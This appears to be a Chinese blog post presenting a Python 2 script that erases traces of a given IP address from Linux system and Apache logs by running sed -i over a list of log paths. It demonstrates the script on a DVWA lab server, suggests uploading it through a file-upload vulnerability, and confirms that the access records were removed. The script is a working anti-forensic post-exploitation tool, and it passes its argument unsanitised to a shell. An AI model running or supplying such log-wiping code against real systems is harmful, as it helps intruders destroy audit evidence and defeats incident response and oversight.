Python安全小工具之Linux日志痕迹清除

主要过程为定义一个log列表,含有Linux中常见的log文件,然后使用os库的path.exists()方法查看是否存在该文件,若存在则使用subprocess库调用sed命令来删除日志中与指定host相关的行以实现痕迹的清除。

先来看看Linux中sed命令的使用:

Python安全小工具之Linux日志痕迹清除_第1张图片

其中‘/127.0.0.1/d’中,d是指定进行删除操作,删除的内容为含有“127.0.0.1”的行,而sed命令的-i参数表示可以直接修改文件内容。确实可以看到,含有“127.0.0.1”字样的行都被删除掉了。

脚本如下:

#coding=utf-8
import os
import sys
import subprocess

def Clear_The_Log(host):
	logs = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]
	print "[*]Trying to find the logs of the Linux......"
	for log in logs:
		if os.path.exists(log):
			print "[+]Found the log: " + log
			subprocess.call("sed -i '/%s/d' %s" % (host, log), shell=True)
			print "[+]Clear the log successfully."

def main():
	try:
		host = sys.argv[1]
		if len(sys.argv) < 1:
			print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"
		Clear_The_Log(host)
	except Exception, e:
		print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"

if __name__ == '__main__':
	main()


先在BT5上测试:

Python安全小工具之Linux日志痕迹清除_第2张图片


接着到DVWA的Web服务器上测试:

查看DVWA的Apache的access.log日志,找到物理机访问的记录:

命令:vim /var/log/apache2/access.log

然后使用输入该vim指令查找即可:/192.168.220.1

Python安全小工具之Linux日志痕迹清除_第3张图片

可以看到物理机即192.168.220.1的Web访问记录。

接着上传脚本,如可借用文件上传漏洞,然后执行脚本:

Python安全小工具之Linux日志痕迹清除_第4张图片

可以看到,脚本找到了Apache的access.log日志并对其进行了清除。

接下来进行确认,同样是查看Apache的access.log日志文件:

vim /var/log/apache2/access.log

Python安全小工具之Linux日志痕迹清除_第5张图片


可以看到,找不到相关的信息,确实清除掉了192.168.220.1主机相应的Web访问记录,即日志痕迹清除成功。


你可能感兴趣的:(脚本,Web安全,Linux,安全开发)